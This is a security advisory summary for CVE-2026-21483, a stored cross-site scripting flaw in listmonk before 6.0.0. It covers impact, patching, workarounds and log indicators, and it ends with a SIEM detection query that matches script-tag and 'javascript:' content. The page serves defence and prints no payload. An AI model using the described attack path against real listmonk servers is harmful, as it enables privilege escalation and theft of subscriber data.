CVE-2026-21483
📋 TL;DR
This is a stored cross-site scripting (XSS) vulnerability in listmonk that allows lower-privileged users to inject malicious JavaScript into campaigns or templates. When higher-privileged users view this content, the XSS executes in their browser context, potentially allowing attackers to perform privileged actions like creating backdoor admin accounts. All listmonk instances running versions before 6.0.0 are affected.
💻 Affected Systems
- listmonk
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Complete compromise of the listmonk instance with attacker gaining super admin privileges, creating backdoor accounts, stealing sensitive data, and potentially pivoting to other systems.
Likely Case
Privilege escalation where attackers gain administrative access to the listmonk platform, allowing them to manipulate mailing lists, send malicious campaigns, or access subscriber data.
If Mitigated
Limited impact if proper user access controls and content sanitization are in place, though the vulnerability still presents a significant risk.
🎯 Exploit Status
Exploitation requires authenticated access with campaign management permissions. The advisory confirms weaponization via the public archive feature where victims only need to visit a malicious link.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 6.0.0
Vendor Advisory: https://github.com/knadh/listmonk/security/advisories/GHSA-jmr4-p576-v565
Restart Required: Yes
Instructions:
1. Backup your listmonk database and configuration. 2. Stop the listmonk service. 3. Update to version 6.0.0 or later using your deployment method (Docker, binary, source). 4. Restart the listmonk service. 5. Verify the update was successful.
🔧 Temporary Workarounds
Restrict User Permissions
allTemporarily remove campaign management permissions from all non-essential users until patching can be completed.
Disable Public Archive Feature
allIf not required, disable the public archive feature to prevent weaponization via malicious links.
🧯 If You Can't Patch
- Implement strict Content Security Policy (CSP) headers to mitigate XSS impact
- Enable audit logging for all user actions and monitor for suspicious campaign/template modifications
🔍 How to Verify
Check if Vulnerable:
Check your listmonk version. If it's below 6.0.0, you are vulnerable.Check Version:
Check the listmonk web interface admin panel or run: ./listmonk --version (if using binary)Verify Fix Applied:
After updating, verify the version is 6.0.0 or higher and test that JavaScript injection in campaigns/templates is properly sanitized.📡 Detection & Monitoring
Log Indicators:
- Unusual campaign or template modifications by lower-privileged users
- JavaScript or script tags in campaign content
- Multiple admin account creation events
Network Indicators:
- Unusual outbound connections from listmonk server
- Suspicious HTTP requests containing script payloads
SIEM Query:
source="listmonk" AND (event="campaign_update" OR event="template_update") AND user_role!="admin" AND (content CONTAINS "<script>" OR content CONTAINS "javascript:")